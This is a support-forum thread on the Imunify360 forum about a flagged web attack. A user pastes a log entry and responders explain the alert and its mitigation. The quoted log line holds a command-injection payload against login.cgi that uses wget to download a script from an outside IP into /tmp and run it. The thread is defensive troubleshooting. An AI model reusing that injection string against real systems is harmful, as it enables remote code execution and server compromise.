A web attack returned code 200 (success).
Forum
Toggle Submenu
  1. Forums
  2. Recent
  3. Tags
Add a reply View Replies (3)
  1. Forums
  2. Imunify360
  3. Imunify360 and Imunify Sensor

Resolved A web attack returned code 200 (success).

  1. Glenn Taylor
    Glenn Taylor
  2. Tuesday, 03 July 2018
  3.  Subscribe via email
Hi there,

I've seen a couple of these in IM logs:



A web attack returned code 200 (success).	

6

block

79.10.148.140 - - [29/Jun/2018:19:45:52 -0600] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ HTTP/1.1" 200 20822 "-" "Hello, World" WL:"0" "-" XFF:"-"


What does it mean when it says: A web attack returned code 200 (success)?

thx
G
Rate this post:
0
Responses (3)
  1. 13.07.2018 10:07:36
  2. # 1
Kateryna Obiidykhata Accepted Answer
Kateryna Obiidykhata
Posts: 64
Joined: 17.08.2016
0
Votes
Undo
Hello! This rule doesn't work correctly - it works on requests to Captcha. Therefore, we will rewrite or remove it soon.
Thank you!
  1. 20.07.2018 15:07:14
  2. # 2
Tonat Accepted Answer
Tonat
Posts: 0
Joined: 23.01.2021
0
Votes
Undo
IMHO, it means that the server has probably been hacked. Look for the file "/tmp/r" and any possible related processes.

More info: https://www.exploit-db.com/exploits/44760/
  1. 24.07.2018 21:07:14
  2. # 3
Exorcist Accepted Answer
Exorcist
Posts: 0
Joined: 23.01.2021
0
Votes
Undo
Hello!
This particular request doesn't trigger a blocking rule though it is being spotted by 3 generic rules from i360_1_generic.conf
Please take into consideration that in order to be blocked a request pattern should present in strict rule sets (blocking rules) but it doesn't based on the 200 response.

You can try to activate Proactive Defense (and turn Kill mode on), which logic is based on an advanced heuristic mechanism but not on patterns match. With this mode enabled the aforementioned request will be 100% blocked (checked!). :)
  • Page :
  • 1


There are no replies made for this post yet.
Be one of the first to reply to this post!
Exorcist
Submit Your Response
Upload files or images for this discussion by clicking on the upload button below. Supports gif,jpg,png,zip,rar,pdf
• Insert • Remove Upload Files (Maximum File Size: 2 MB)
Cite your Sources with a URL link to help readers verify facts or find more details.
Add Another Link
Captcha
To protect the site from bots and unauthorized scripts, we require that you enter the captcha codes below before posting your question.

General
General
  1. 542 posts
  2. 2 subcategories
CloudLinux and Control Panels
CloudLinux and Control Panels
  1. 1138 posts
  2. 5 subcategories
KernelCare
KernelCare
  1. 74 posts
  2. 1 subcategory
Imunify360
Imunify360
  1. 217 posts
  2. 1 subcategory

Stay in touch

CloudLinux Facebook Facebook 9K+ followers CloudLinux Twitter Twitter 10K+ followers CloudLinux YouTube Channel YouTube official channel CloudLinux on LinkedIn LinkedIn Follow us

Products
Success Stories
Partners
Support
About Us
privacy shield certified
aicpa soc
pci-dss
eu gdpr compliant

© All rights reserved. CloudLinux Inc.
Terms of Use | Privacy Policy | Vulnerability Reporting | Code of Ethics | Legal 

Call Sales at +1 (800) 231-7307

Email [email protected]

EU e-Privacy Directive

We use cookies to ensure you get the best experience using our website and services. Read more about it in our Privacy Policy. Please agree to the use of cookies to proceed. Alternatively, you may disable cookies in your browser at any time.

You have declined cookies. This decision can be reversed.

You have allowed cookies to be placed on your computer. This decision can be reversed.